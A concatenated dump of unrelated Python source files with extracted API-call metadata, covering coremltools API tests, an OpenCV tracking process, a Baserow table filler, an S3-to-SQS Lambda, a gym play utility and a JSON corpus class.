334), False, 'import cv2\n'), ((1083, 1116), 'cv2.imwrite', 'cv2.imwrite', (['"""capture.png"""', 'frame'], {}), "('capture.png', frame)\n", (1094, 1116), False, 'import cv2\n')]
|
import coremltools as ct
import pytest
def _get_visible_items(d):
return [x for x in dir(d) if not x.startswith("_")]
def _check_visible_modules(actual, expected):
if set(actual) != set(expected):
raise AssertionError("API mis-matched. Got %s, expected %s" % (
actual,
expected,
))
class TestApiVisibilities:
"""Test public coremltools API visibilities."""
@staticmethod
def test_top_level():
expected = [
"ClassifierConfig",
"EnumeratedShapes",
"ImageType",
"RangeDim",
"SPECIFICATION_VERSION",
"Shape",
"TensorType",
"convert",
"converters",
"libcoremlpython",
"models",
"proto",
"target",
"utils",
"version",
"test",
]
if not ct.utils._is_macos():
expected.remove("libcoremlpython")
_check_visible_modules(_get_visible_items(ct), expected)
@staticmethod
def test_utils():
expected = [
"convert_double_to_float_multiarray_type",
"convert_neural_network_spec_weights_to_fp16",
"convert_neural_network_weights_to_fp16",
"evaluate_classifier",
"evaluate_classifier_with_probabilities",
"evaluate_regressor",
"evaluate_transformer",
"load_spec",
"rename_feature",
"save_spec",
]
_check_visible_modules(_get_visible_items(ct.utils), expected)
@staticmethod
def test_models():
expected = [
"MLModel",
"datatypes",
"model",
"neural_network",
"pipeline",
"tree_ensemble",
"utils",
"nearest_neighbors",
"feature_vectorizer",
]
_check_visible_modules(_get_visible_items(ct.models), expected)
@staticmethod
def test_models_mlmodel():
expected = [
"author",
"get_spec",
"input_description",
"license",
"output_description",
"predict",
"save",
"short_description",
"user_defined_metadata",
"version",
]
_check_visible_modules(_get_visible_items(ct.models.MLModel), expected)
@staticmethod
def test_models_neural_network():
expected = [
"AdamParams",
"NeuralNetworkBuilder",
"SgdParams",
"builder",
"datatypes",
"flexible_shape_utils",
"optimization_utils",
"printer",
"quantization_utils",
"set_training_features",
"set_transform_interface_params",
"spec_inspection_utils",
"update_optimizer_utils",
"utils",
]
_check_visible_modules(_get_visible_items(ct.models.neural_network), expected)
@staticmethod
def test_models_neural_network_utils():
expected = ["NeuralNetworkBuilder", "make_image_input", "make_nn_classifier"]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.utils), expected
)
@staticmethod
def test_models_tree_ensemble():
expected = [
"TreeEnsembleBase",
"TreeEnsembleClassifier",
"TreeEnsembleRegressor",
"set_classifier_interface_params",
"set_regressor_interface_params",
]
_check_visible_modules(_get_visible_items(ct.models.tree_ensemble), expected)
@staticmethod
def test_models_pipeline():
expected = [
"Pipeline",
"PipelineClassifier",
"PipelineRegressor",
"set_classifier_interface_params",
"set_regressor_interface_params",
"set_training_features",
"set_transform_interface_params",
]
_check_visible_modules(_get_visible_items(ct.models.pipeline), expected)
@staticmethod
def test_converters():
expected = [
"ClassifierConfig",
"EnumeratedShapes",
"ImageType",
"RangeDim",
"Shape",
"TensorType",
"caffe",
"convert",
"keras",
"libsvm",
"mil",
"onnx",
"sklearn",
"xgboost",
]
_check_visible_modules(_get_visible_items(ct.converters), expected)
@staticmethod
def test_converters_caffe():
_check_visible_modules(_get_visible_items(ct.converters.caffe), ["convert"])
@pytest.mark.skipif(
ct.utils._python_version() >= (3, 8, 0),
reason="Keras isn't compatible with Python 3.8+.",
)
@pytest.mark.xfail(
condition=not ct.utils._is_macos(),
reason="rdar://65138103 (Keras converter not exposed on Linux)",
run=False,
)
def test_converters_keras(self):
_check_visible_modules(_get_visible_items(ct.converters.keras), ["convert"])
@staticmethod
def test_converters_libsvm():
_check_visible_modules(_get_visible_items(ct.converters.libsvm), ["convert"])
@pytest.mark.skipif(
ct.utils._python_version() >= (3, 8, 0),
reason="ONNX isn't compatible with Python 3.8+.",
)
def test_converters_onnx(self):
_check_visible_modules(_get_visible_items(ct.converters.onnx), ["convert"])
@staticmethod
def test_converters_sklearn():
_check_visible_modules(_get_visible_items(ct.converters.sklearn), ["convert"])
@staticmethod
def test_converters_xgboost():
_check_visible_modules(_get_visible_items(ct.converters.xgboost), ["convert"])
def test_converters_mil(self):
pass # TODO: [Create API visibility tests for MIL](rdar://64413959)
@staticmethod
def test_models_neural_network_quantization_utils():
expected = [
"AdvancedQuantizedLayerSelector",
"MatrixMultiplyLayerSelector",
"ModelMetrics",
"NoiseMetrics",
"OutputMetric",
"QuantizedLayerSelector",
"TopKMetrics",
"activate_int8_int8_matrix_multiplications",
"compare_models",
"quantize_weights",
]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.quantization_utils), expected
)
@staticmethod
def test_models_neural_network_flexible_shape_utils():
expected = [
"NeuralNetworkImageSize",
"NeuralNetworkImageSizeRange",
"NeuralNetworkMultiArrayShape",
"NeuralNetworkMultiArrayShapeRange",
"Shape",
"ShapeRange",
"Size",
"add_enumerated_image_sizes",
"add_enumerated_multiarray_shapes",
"add_multiarray_ndshape_enumeration",
"set_multiarray_ndshape_range",
"update_image_size_range",
"update_multiarray_shape_range",
]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.flexible_shape_utils), expected
)
@staticmethod
def test_models_neural_network_update_optimizer_utils():
expected = ["AdamParams", "Batch", "RangeParam", "SgdParams"]
_check_visible_modules(
_get_visible_items(ct.models.neural_network.update_optimizer_utils),
expected,
)
@staticmethod
def test_models_neural_network_optimization_utils():
_check_visible_modules(
_get_visible_items(ct.models.neural_network.optimization_utils), [],
)
|
[
"coremltools.utils._is_macos",
"coremltools.utils._python_version"
] |
[((912, 932), 'coremltools.utils._is_macos', 'ct.utils._is_macos', ([], {}), '()\n', (930, 932), True, 'import coremltools as ct\n'), ((4754, 4780), 'coremltools.utils._python_version', 'ct.utils._python_version', ([], {}), '()\n', (4778, 4780), True, 'import coremltools as ct\n'), ((5325, 5351), 'coremltools.utils._python_version', 'ct.utils._python_version', ([], {}), '()\n', (5349, 5351), True, 'import coremltools as ct\n'), ((4907, 4927), 'coremltools.utils._is_macos', 'ct.utils._is_macos', ([], {}), '()\n', (4925, 4927), True, 'import coremltools as ct\n')]
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
class NistschemaSvIvAtomicIdEnumeration1Type(Enum):
ITEMPLATES_RESOURCE = "itemplates.resource_"
HORGANIZ = "horganiz"
WORK_OF_IS_DOCUMENTS_RELATIONSHIPS_OF_AT_OBJECT = "_work-of-is-documents_relationships-of_at.object"
MACCOMPLISH_VERSIONS_CARE_DEFINE_AND_PR = "maccomplish.versions.care.define-and.pr"
DALLOW_SUCCESS_OF_DEVICES_ENOUGH_THE_RETRIEVE = "dallow-success-of_devices_enough_the.retrieve"
MANUFACTURERS_INFORMATION_WORLD_TH = "_manufacturers_information.world_th"
HDOCUMENTS_IMPACT = "hdocuments-impact"
@dataclass
class Out:
class Meta:
name = "out"
namespace = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
any_element: Optional[object] = field(
default=None,
metadata={
"type": "Wildcard",
"namespace": "##any",
}
)
@dataclass
class NistschemaSvIvAtomicIdEnumeration1:
class Meta:
name = "NISTSchema-SV-IV-atomic-ID-enumeration-1"
namespace = "NISTSchema-SV-IV-atomic-ID-enumeration-1-NS"
value: Optional[NistschemaSvIvAtomicIdEnumeration1Type] = field(
default=None,
metadata={
"required": True,
}
)
|
[
"dataclasses.field"
] |
[((863, 935), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'type': 'Wildcard', 'namespace': '##any'}"}), "(default=None, metadata={'type': 'Wildcard', 'namespace': '##any'})\n", (868, 935), False, 'from dataclasses import dataclass, field\n'), ((1251, 1299), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'required': True}"}), "(default=None, metadata={'required': True})\n", (1256, 1299), False, 'from dataclasses import dataclass, field\n')]
|
import os
import sys
import csv
import cv2
import math
import time
import numbers
import numpy as np
from multiprocessing import Process
# local imported codes
import parameters as parm
from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, \
single_cam_detector, multi_cam_detector
class SingleCameraDetector(Process):
"""
Process for single camera detection
"""
def __init__(self, index, queue, FPS):
super().__init__()
self.queue = queue
self.index = index
self.realtime = isinstance(self.index, numbers.Number)
self.fps = FPS
self.frame_h = None
self.frame_w = None
self.scale_factor = None
self.aspect_ratio = None
self.cap = None
self.fgbg = None
self.detector = None
self.video_ends_indicator = 0
self.frame_count = 0
self.frame = None
self.good_tracks = None
self.origin = np.array([0, 0])
self.tracks = []
self.next_id = 0
def run(self):
self.cap = cv2.VideoCapture(self.index)
self.frame_w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.frame_h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
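        # Ratio of this frame's diagonal to a 848x480 reference diagonal, used to scale the detector setup.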
self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
self.aspect_ratio = self.frame_w / self.frame_h
downsample = False
if self.frame_w * self.frame_h > 1920 * 1080:
downsample = True
self.frame_w = 1920
            self.frame_h = int(1920 / self.aspect_ratio)
self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
self.fgbg, self.detector = setup_system_objects(self.scale_factor)
# check if video capturing is successful
ret, self.frame = self.cap.read()
if ret:
if self.realtime:
print(f"Video Capture {self.index}: PASS")
else:
print(f"File Read \"{self.index}\": PASS")
else:
if self.realtime:
print(f"Video Capture {self.index}: FAIL")
else:
print(f"File Read \"{self.index}\": FAIL")
self.cap.release()
while self.cap.isOpened():
ret, self.frame = self.cap.read()
if ret:
self.frame = cv2.resize(self.frame, (self.frame_w, self.frame_h))
self.good_tracks, self.tracks, self.next_id, self.frame = single_cam_detector(
self.tracks, self.next_id, self.index, self.fgbg, self.detector, self.fps,
self.frame_w, self.frame_h, self.scale_factor, self.origin, self.frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
self.video_ends_indicator = 1
break
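            # Hand the latest detections, frame count and frame to whatever consumes the shared queue.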
self.queue.put((self.good_tracks, self.frame_count, self.frame))
self.frame_count += 1
if self.video_ends_indicator == 1:
break
self.cap.release()
cv2.destroyAllWindows()
class MultiCameraDetector(Process):
"""
Process for multi camera detection
"""
def __init__(self, filenames, queue, FPS):
super().__init__()
self.filenames = filenames
self.queue = queue
self.realtime = isinstance(self.filenames[0], numbers.Number)
self.cameras = []
self.fps = FPS
self.video_ends_indicator = 0
self.frame_count = 0
self.good_tracks = None
self.start_timer = None
self.end_timer = None
def run(self):
for filename in self.filenames:
camera = Camera(filename, self.fps)
ret, self.frame = camera.cap.read()
if ret:
self.cameras.append(camera)
if self.realtime:
print(f"Video Capture {filename}: PASS")
else:
print(f"File Read \"{filename}\": PASS")
else:
if self.realtime:
print(f"Video Capture {filename}: FAIL")
else:
print(f"File Read \"{filename}\": FAIL")
camera.cap.release()
while True:
self.start_timer = time.time()
sendList = []
for index, camera in enumerate(self.cameras):
ret, frame = camera.cap.read()
if ret:
frame = cv2.resize(frame, (camera.frame_w, camera.frame_h))
self.good_tracks, frame = multi_cam_detector(camera, frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.video_ends_indicator = 1
break
else:
self.video_ends_indicator = 1
break
sendList.append((self.good_tracks, frame, camera.dead_tracks))
# sendList: [(good_tracks_0, frame_0, dead_tracks_0), (good_tracks_1, frame_1, dead_tracks_1), frame_count]
sendList.append((self.frame_count))
self.queue.put(sendList)
self.frame_count += 1
if self.video_ends_indicator == 1:
break
self.end_timer = time.time()
print(f"Detection process took: {self.end_timer - self.start_timer}")
cv2.destroyAllWindows()
for index, camera in enumerate(self.cameras):
camera.cap.release()
with open(f"data_out_{index}.csv", 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
for row in camera.output_log:
writer.writerow(row)
|
[
"object_tracking_util.setup_system_objects",
"object_tracking_util.Camera",
"math.sqrt",
"csv.writer",
"cv2.waitKey",
"time.time",
"cv2.VideoCapture",
"numpy.array",
"object_tracking_util.multi_cam_detector",
"object_tracking_util.single_cam_detector",
"cv2.destroyAllWindows",
"cv2.resize"
] |
[((995, 1011), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (1003, 1011), True, 'import numpy as np\n'), ((1101, 1129), 'cv2.VideoCapture', 'cv2.VideoCapture', (['self.index'], {}), '(self.index)\n', (1117, 1129), False, 'import cv2\n'), ((1785, 1824), 'object_tracking_util.setup_system_objects', 'setup_system_objects', (['self.scale_factor'], {}), '(self.scale_factor)\n', (1805, 1824), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((3163, 3186), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3184, 3186), False, 'import cv2\n'), ((5472, 5495), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5493, 5495), False, 'import cv2\n'), ((1293, 1341), 'math.sqrt', 'math.sqrt', (['(self.frame_w ** 2 + self.frame_h ** 2)'], {}), '(self.frame_w ** 2 + self.frame_h ** 2)\n', (1302, 1341), False, 'import math\n'), ((1344, 1374), 'math.sqrt', 'math.sqrt', (['(848 ** 2 + 480 ** 2)'], {}), '(848 ** 2 + 480 ** 2)\n', (1353, 1374), False, 'import math\n'), ((3777, 3803), 'object_tracking_util.Camera', 'Camera', (['filename', 'self.fps'], {}), '(filename, self.fps)\n', (3783, 3803), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((4379, 4390), 'time.time', 'time.time', ([], {}), '()\n', (4388, 4390), False, 'import time\n'), ((5369, 5380), 'time.time', 'time.time', ([], {}), '()\n', (5378, 5380), False, 'import time\n'), ((1667, 1715), 'math.sqrt', 'math.sqrt', (['(self.frame_w ** 2 + self.frame_h ** 2)'], {}), '(self.frame_w ** 2 + self.frame_h ** 2)\n', (1676, 1715), False, 'import math\n'), ((1718, 1748), 'math.sqrt', 'math.sqrt', (['(848 ** 2 + 480 ** 2)'], {}), '(848 ** 2 + 480 ** 2)\n', (1727, 1748), False, 'import math\n'), ((2441, 2493), 'cv2.resize', 'cv2.resize', (['self.frame', '(self.frame_w, self.frame_h)'], {}), '(self.frame, (self.frame_w, self.frame_h))\n', (2451, 2493), False, 'import cv2\n'), ((2569, 2745), 'object_tracking_util.single_cam_detector', 'single_cam_detector', (['self.tracks', 'self.next_id', 'self.index', 'self.fgbg', 'self.detector', 'self.fps', 'self.frame_w', 'self.frame_h', 'self.scale_factor', 'self.origin', 'self.frame'], {}), '(self.tracks, self.next_id, self.index, self.fgbg, self.\n detector, self.fps, self.frame_w, self.frame_h, self.scale_factor, self\n .origin, self.frame)\n', (2588, 2745), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((5685, 5704), 'csv.writer', 'csv.writer', (['csvfile'], {}), '(csvfile)\n', (5695, 5704), False, 'import csv\n'), ((4575, 4626), 'cv2.resize', 'cv2.resize', (['frame', '(camera.frame_w, camera.frame_h)'], {}), '(frame, (camera.frame_w, camera.frame_h))\n', (4585, 4626), False, 'import cv2\n'), ((4673, 4706), 'object_tracking_util.multi_cam_detector', 'multi_cam_detector', (['camera', 'frame'], {}), '(camera, frame)\n', (4691, 4706), False, 'from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, single_cam_detector, multi_cam_detector\n'), ((2797, 2811), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2808, 2811), False, 'import cv2\n'), ((4731, 4745), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (4742, 4745), False, 'import cv2\n')]
|
import os
TEST_API_TOKEN = os.getenv('ZENODO_ACCESS_TOKEN')
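# Note (assumption about intended use): os.getenv returns None when the
# variable is unset, so export ZENODO_ACCESS_TOKEN before running these tests.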
|
[
"os.getenv"
] |
[((28, 60), 'os.getenv', 'os.getenv', (['"""ZENODO_ACCESS_TOKEN"""'], {}), "('ZENODO_ACCESS_TOKEN')\n", (37, 60), False, 'import os\n')]
|
import sys
from decimal import Decimal
from math import ceil
from django.core.management.base import BaseCommand
from django.db.models import Max
from faker import Faker
from baserow.contrib.database.fields.field_helpers import (
construct_all_possible_field_kwargs,
)
from baserow.contrib.database.fields.handler import FieldHandler
from baserow.contrib.database.rows.handler import RowHandler
from baserow.contrib.database.table.models import Table
class Command(BaseCommand):
help = "Fills a table with random data."
def add_arguments(self, parser):
parser.add_argument(
"table_id", type=int, help="The table that needs to be " "filled."
)
parser.add_argument(
"limit", type=int, help="Amount of rows that need to be " "inserted."
)
parser.add_argument(
"--add-columns",
action="store_true",
help="Add a column for every field type other than link row to the table "
"before populating it.",
)
def handle(self, *args, **options):
table_id = options["table_id"]
limit = options["limit"]
add_columns = "add_columns" in options and options["add_columns"]
try:
table = Table.objects.get(pk=table_id)
except Table.DoesNotExist:
self.stdout.write(
self.style.ERROR(f"The table with id {table_id} was not " f"found.")
)
sys.exit(1)
fill_table(limit, table, add_columns=add_columns)
self.stdout.write(self.style.SUCCESS(f"{limit} rows have been inserted."))
def fill_table(limit, table, add_columns=False):
fake = Faker()
row_handler = RowHandler()
cache = {}
if add_columns:
create_a_column_for_every_type(table)
model = table.get_model()
# Find out what the highest order is because we want to append the new rows.
order = ceil(model.objects.aggregate(max=Max("order")).get("max") or Decimal("0"))
for i in range(0, limit):
# Based on the random_value function we have for each type we can
# build a dict with a random value for each field.
values = {
f"field_{field_id}": field_object["type"].random_value(
field_object["field"], fake, cache
)
for field_id, field_object in model._field_objects.items()
}
values, manytomany_values = row_handler.extract_manytomany_values(values, model)
order += Decimal("1")
values["order"] = order
# Insert the row with the randomly created values.
instance = model.objects.create(**values)
# Changes the set of the manytomany values.
for field_name, value in manytomany_values.items():
if value and len(value) > 0:
getattr(instance, field_name).set(value)
def create_a_column_for_every_type(table):
field_handler = FieldHandler()
all_kwargs_per_type = construct_all_possible_field_kwargs(None, None, None)
for field_type_name, all_possible_kwargs in all_kwargs_per_type.items():
if field_type_name == "link_row":
continue
i = 0
for kwargs in all_possible_kwargs:
i = i + 1
field_handler.create_field(
table.database.group.users.first(), table, field_type_name, **kwargs
)
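# Usage sketch (hypothetical table id and row count; assumes a configured
# Baserow development install where this management command is registered):
#
#   python manage.py fill_table 42 100 --add-columns
#
# This first adds one field per non-link-row field type, then inserts 100
# rows of Faker-generated values into table 42.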
|
[
"django.db.models.Max",
"baserow.contrib.database.fields.handler.FieldHandler",
"faker.Faker",
"decimal.Decimal",
"baserow.contrib.database.table.models.Table.objects.get",
"baserow.contrib.database.fields.field_helpers.construct_all_possible_field_kwargs",
"baserow.contrib.database.rows.handler.RowHandler",
"sys.exit"
] |
[((1680, 1687), 'faker.Faker', 'Faker', ([], {}), '()\n', (1685, 1687), False, 'from faker import Faker\n'), ((1706, 1718), 'baserow.contrib.database.rows.handler.RowHandler', 'RowHandler', ([], {}), '()\n', (1716, 1718), False, 'from baserow.contrib.database.rows.handler import RowHandler\n'), ((2932, 2946), 'baserow.contrib.database.fields.handler.FieldHandler', 'FieldHandler', ([], {}), '()\n', (2944, 2946), False, 'from baserow.contrib.database.fields.handler import FieldHandler\n'), ((2973, 3026), 'baserow.contrib.database.fields.field_helpers.construct_all_possible_field_kwargs', 'construct_all_possible_field_kwargs', (['None', 'None', 'None'], {}), '(None, None, None)\n', (3008, 3026), False, 'from baserow.contrib.database.fields.field_helpers import construct_all_possible_field_kwargs\n'), ((2501, 2513), 'decimal.Decimal', 'Decimal', (['"""1"""'], {}), "('1')\n", (2508, 2513), False, 'from decimal import Decimal\n'), ((1255, 1285), 'baserow.contrib.database.table.models.Table.objects.get', 'Table.objects.get', ([], {'pk': 'table_id'}), '(pk=table_id)\n', (1272, 1285), False, 'from baserow.contrib.database.table.models import Table\n'), ((1984, 1996), 'decimal.Decimal', 'Decimal', (['"""0"""'], {}), "('0')\n", (1991, 1996), False, 'from decimal import Decimal\n'), ((1463, 1474), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1471, 1474), False, 'import sys\n'), ((1956, 1968), 'django.db.models.Max', 'Max', (['"""order"""'], {}), "('order')\n", (1959, 1968), False, 'from django.db.models import Max\n')]
|
import json,boto3,os,logging
from botocore.exceptions import ClientError
logger = logging.getLogger("AKAM:S3-NS-SYNC")
def configure_logging():
logger.setLevel(logging.DEBUG)
# Format for our loglines
formatter = logging.Formatter("%(name)s - %(levelname)s - %(message)s")
# Setup console logging
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
logger.addHandler(ch)
def addToQueue(record):
"""
    Description: add the processed event records to the SQS queue
    Links:
        https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html#SQS.Client.send_message
    Expects:
        record
    Returns: True on success, False on failure
"""
sqs = boto3.client('sqs')
try:
response = sqs.send_message(
QueueUrl= os.environ['queueUrl'],
DelaySeconds=0,
MessageBody=(json.dumps(record)),
MessageGroupId='S3-NS-SYNC'
)
logger.info ("Record added to queue: {0}".format(record))
except Exception as e:
logger.error ("Error adding record '{0}' to queue: {1}".format(record,e))
return False
return True
def lambda_handler(event, context):
configure_logging()
statusCode = 200
record_lst = []
logger.info ("Events {0} received.".format(len(event['Records'])))
for record in event['Records']:
new_record = {
'eventName':record['eventName'],
'bucket':record['s3']['bucket']['name'],
'key':record['s3']['object']['key'],
'etag':record['s3']['object']['eTag'],
'sequencer':record['s3']['object']['sequencer']
}
record_lst.append(new_record)
if addToQueue(record_lst) is False:
statusCode = 500
if len(record_lst) == 0:
statusCode = 500
if statusCode == 500:
return {
'statusCode': statusCode,
'body': 'Error, {0}/{1} added to queue!'.format(len(record_lst),len(event['Records']))
}
return {
'statusCode': statusCode,
'body': 'Success, {0}/{1} Added to queue!'.format(len(record_lst),len(event['Records']))
}
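# Local smoke-test sketch (hypothetical event mirroring the S3 notification
# fields read above; without a 'queueUrl' env var, addToQueue catches the
# lookup error, returns False, and the handler reports a 500 body):
if __name__ == "__main__":
    fake_event = {
        "Records": [
            {
                "eventName": "ObjectCreated:Put",
                "s3": {
                    "bucket": {"name": "example-bucket"},
                    "object": {
                        "key": "path/to/file.txt",
                        "eTag": "d41d8cd98f00b204e9800998ecf8427e",
                        "sequencer": "0055AED6DCD90281E5",
                    },
                },
            }
        ]
    }
    print(lambda_handler(fake_event, None))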
|
[
"boto3.client",
"logging.StreamHandler",
"json.dumps",
"logging.Formatter",
"logging.getLogger"
] |
[((83, 119), 'logging.getLogger', 'logging.getLogger', (['"""AKAM:S3-NS-SYNC"""'], {}), "('AKAM:S3-NS-SYNC')\n", (100, 119), False, 'import json, boto3, os, logging\n'), ((227, 286), 'logging.Formatter', 'logging.Formatter', (['"""%(name)s - %(levelname)s - %(message)s"""'], {}), "('%(name)s - %(levelname)s - %(message)s')\n", (244, 286), False, 'import json, boto3, os, logging\n'), ((324, 347), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (345, 347), False, 'import json, boto3, os, logging\n'), ((747, 766), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (759, 766), False, 'import json, boto3, os, logging\n'), ((918, 936), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (928, 936), False, 'import json, boto3, os, logging\n')]
|
import gym
#import pygame
import sys
import time
import matplotlib
import time
import pygame
import pybullet as p
from gibson.core.render.profiler import Profiler
try:
    matplotlib.use('GTK3Agg')
except Exception:
    pass
import matplotlib.pyplot as plt  # PlayPlot below needs plt; the guard above only covers the backend switch
#import pyglet.window as pw
from collections import deque
#from pygame.locals import HWSURFACE, DOUBLEBUF, RESIZABLE, VIDEORESIZE
from threading import Thread
def display_arr(screen, arr, video_size, transpose):
arr_min, arr_max = arr.min(), arr.max()
arr = 255.0 * (arr - arr_min) / (arr_max - arr_min)
pyg_img = pygame.surfarray.make_surface(arr.swapaxes(0, 1) if transpose else arr)
pyg_img = pygame.transform.scale(pyg_img, video_size)
screen.blit(pyg_img, (0,0))
def play(env, transpose=True, zoom=None, callback=None, keys_to_action=None):
"""Allows one to play the game using keyboard.
To simply play the game use:
play(gym.make("Pong-v3"))
play(env)
Above code works also if env is wrapped, so it's particularly useful in
verifying that the frame-level preprocessing does not render the game
unplayable.
If you wish to plot real time statistics as you play, you can use
    gym.utils.play.PlayPlot. Here's sample code for plotting the reward
    for the last 5 seconds of gameplay.
        def callback(obs_t, obs_tp1, action, rew, done, info):
            return [rew,]
        env_plotter = PlayPlot(callback, 30 * 5, ["reward"])
env = gym.make("Pong-v3")
play(env, callback=env_plotter.callback)
Arguments
---------
env: gym.Env
Environment to use for playing.
transpose: bool
If True the output of observation is transposed.
Defaults to true.
zoom: float
Make screen edge this many times bigger
callback: lambda or None
Callback if a callback is provided it will be executed after
every step. It takes the following input:
obs_t: observation before performing action
obs_tp1: observation after performing action
action: action that was executed
rew: reward that was received
            done: whether the environment is done or not
info: debug info
keys_to_action: dict: tuple(int) -> int or None
Mapping from keys pressed to action performed.
For example if pressed 'w' and space at the same time is supposed
to trigger action number 2 then key_to_action dict would look like this:
{
# ...
sorted(ord('w'), ord(' ')) -> 2
# ...
}
If None, default key_to_action mapping for that env is used, if provided.
"""
obs_s = env.observation_space
#assert type(obs_s) == gym.spaces.box.Box
#assert len(obs_s.shape) == 2 or (len(obs_s.shape) == 3 and obs_s.shape[2] in [1,3])
if keys_to_action is None:
if hasattr(env, 'get_keys_to_action'):
keys_to_action = env.get_keys_to_action()
elif hasattr(env.unwrapped, 'get_keys_to_action'):
keys_to_action = env.unwrapped.get_keys_to_action()
relevant_keys = set(sum(map(list, keys_to_action.keys()),[]))
pressed_keys = []
running = True
env_done = True
record_num = 0
record_total = 0
obs = env.reset()
do_restart = False
last_keys = [] ## Prevent overacting
while running:
print('robot xyz {} rpy {}'.format(env.get_robot_xyz(), env.robot.get_rpy()))
# print("obs", obs)
if do_restart:
do_restart = False
env.reset()
pressed_keys = []
continue
if len(pressed_keys) == 0:
action = keys_to_action[()]
# obs, rew, env_done, info = env.step(action)
# env.step(4)
# with Profiler("Play Env: step"):
# start = time.time()
# obs, rew, env_done, info = env.step(action)
# record_total += time.time() - start
# record_num += 1
# print(info['sensor'])
# print("Play mode: reward %f" % rew)
for p_key in pressed_keys:
action = keys_to_action[(p_key, )]
prev_obs = obs
obs, rew, env_done, info = env.step(action)
# with Profiler("Play Env: step"):
# start = time.time()
# obs, rew, env_done, info = env.step(action)
# record_total += time.time() - start
# record_num += 1
# print("Play mode: reward %f" % rew)
# print('obs: {}'.format(obs))
if callback is not None:
callback(prev_obs, obs, action, rew, env_done, info)
# process pygame events
key_codes = env.get_key_pressed(relevant_keys)
#print("Key codes", key_codes)
pressed_keys = []
for key in key_codes:
if key == ord('r') and key not in last_keys:
do_restart = True
if key == ord('j') and key not in last_keys:
env.robot.turn_left()
if key == ord('l') and key not in last_keys:
env.robot.turn_right()
if key == ord('i') and key not in last_keys:
env.robot.move_forward()
if key == ord('k') and key not in last_keys:
env.robot.move_backward()
if key not in relevant_keys:
continue
pressed_keys.append(key)
last_keys = key_codes
class PlayPlot(object):
def __init__(self, callback, horizon_timesteps, plot_names):
self.data_callback = callback
self.horizon_timesteps = horizon_timesteps
self.plot_names = plot_names
num_plots = len(self.plot_names)
self.fig, self.ax = plt.subplots(num_plots)
if num_plots == 1:
self.ax = [self.ax]
for axis, name in zip(self.ax, plot_names):
axis.set_title(name)
self.t = 0
self.cur_plot = [None for _ in range(num_plots)]
self.data = [deque(maxlen=horizon_timesteps) for _ in range(num_plots)]
def callback(self, obs_t, obs_tp1, action, rew, done, info):
points = self.data_callback(obs_t, obs_tp1, action, rew, done, info)
for point, data_series in zip(points, self.data):
data_series.append(point)
self.t += 1
xmin, xmax = max(0, self.t - self.horizon_timesteps), self.t
for i, plot in enumerate(self.cur_plot):
if plot is not None:
plot.remove()
self.cur_plot[i] = self.ax[i].scatter(range(xmin, xmax), list(self.data[i]))
self.ax[i].set_xlim(xmin, xmax)
plt.pause(0.000001)
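# Usage sketch (hedged: "Pong-v3" follows the docstring above; keys_to_action
# keys are tuples of pressed key ordinals, with () meaning "no key held"):
#
#   env = gym.make("Pong-v3")
#   mapping = {(): 0, (ord('w'),): 1, (ord('s'),): 2}
#   play(env, keys_to_action=mapping)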
|
[
"pygame.transform.scale",
"collections.deque"
] |
[((684, 727), 'pygame.transform.scale', 'pygame.transform.scale', (['pyg_img', 'video_size'], {}), '(pyg_img, video_size)\n', (706, 727), False, 'import pygame\n'), ((6118, 6149), 'collections.deque', 'deque', ([], {'maxlen': 'horizon_timesteps'}), '(maxlen=horizon_timesteps)\n', (6123, 6149), False, 'from collections import deque\n')]
|
import json
class Corpus(object):
def __init__(self, weighted_bigrams={}, occurrences={}):
self.weighted_bigrams = weighted_bigrams
self.occurrences = occurrences
@classmethod
def load(cls, path):
with open(path, 'r') as f:
data = f.read()
return cls(**json.loads(data))
def __eq__(self, other):
return self.weighted_bigrams == other.weighted_bigrams and self.occurrences == other.occurrences
def save(self, path):
saved_corpus = {
'weighted_bigrams': self.weighted_bigrams,
'occurrences': self.occurrences
}
with open(path, 'w') as f:
f.write(json.dumps(saved_corpus))
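# Round-trip sketch (path is hypothetical) exercising save, load and __eq__:
#
#   corpus = Corpus(weighted_bigrams={'a b': 0.5}, occurrences={'a': 2})
#   corpus.save('/tmp/corpus.json')
#   assert Corpus.load('/tmp/corpus.json') == corpus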
|
[
"json.loads",
"json.dumps"
] |
